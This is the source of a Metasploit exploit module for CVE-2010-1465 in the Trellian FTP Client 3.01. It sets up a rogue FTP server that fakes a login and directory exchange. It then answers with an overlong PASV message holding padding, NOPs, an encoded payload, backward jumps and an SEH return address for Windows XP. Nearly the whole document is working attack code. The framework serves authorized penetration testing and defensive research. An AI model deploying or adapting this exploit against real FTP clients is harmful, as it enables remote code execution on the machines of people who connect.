rapid7/metasploit-framework

View on GitHub
modules/exploits/windows/ftp/trellian_client_pasv.rb

Summary

Maintainability
A
0 mins
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered
        through an excessively long PASV message.
      },
      'Author'      =>
        [
          'zombiefx',  # Original exploit author
          'dookie'     # MSF module author
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-1465'],
          [ 'OSVDB', '63812'],
          [ 'EDB', '12152' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          'Space'    => 900,
          'BadChars' => "\x00\x29\x2c\x2e",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP Universal', { 'Ret' => "\xfd\x21\x40" } ], # 0x004021fd  p/p/r in ftp.exe
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2010-04-11',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
      ])
  end

  def on_client_connect(client)
    return if ((p = regenerate_payload(client)) == nil)

    # Let the client log in
    client.get_once

    user = "331 Please specify the password.\r\n"
    client.put(user)

    client.get_once
    pass = "230 Login successful.\r\n"
    client.put(pass)

    # Handle the clients PWD command
    client.get_once
    pwd = "257 \"/\" is current directory.\r\n"
    client.put(pwd)
    client.get_once

    sploit = "227 Entering Passive Mode ("
    sploit << rand_text_alpha_upper(2171)
    sploit << make_nops(100)
    sploit << payload.encoded
    sploit << make_nops(900 - (payload.encoded.length))
    sploit << "\xe9\x18\xfc\xff\xff"  # Jump back 1000 bytes
    sploit << "\xeb\xf9\x90\x90"      # Jump back 7 bytes
    sploit << [target.ret].pack("A3")
    sploit << ")\r\n"

    client.put(sploit)

  end
end